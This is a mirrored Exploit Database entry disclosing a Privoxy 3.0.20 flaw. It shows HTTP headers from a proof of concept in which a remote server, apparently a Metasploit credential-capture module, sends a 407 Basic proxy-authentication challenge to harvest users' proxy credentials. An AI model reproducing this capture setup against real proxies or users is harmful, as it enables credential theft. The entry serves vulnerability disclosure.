Privoxy Proxy – Authentication Information Disclosure

• Exploit Database
• 12 阅读

• 作者： Chris John Riley
  日期： 2013-03-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38377/

• source: https://www.securityfocus.com/bid/58425/info
  
  Privoxy is prone to multiple information-disclosure vulnerabilities.
  
  Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
  
  Privoxy 3.0.20 is affected; other versions may also be vulnerable. 
  
  Response Code (current).: 407
  
  Response Headers (as seen by your browser).:
  
  HTTP/1.1 407 Proxy Authentication Required
  Date: Mon, 11 Mar 2013 17:01:59 GMT
  Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
  Proxy-Authenticate: Basic
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 571
  Keep-Alive: timeout=15, max=99
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  
  Request Headers (as seen by the remote website)
  
  Host: c22.cc
  User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://www.example.com/
  Connection: keep-alive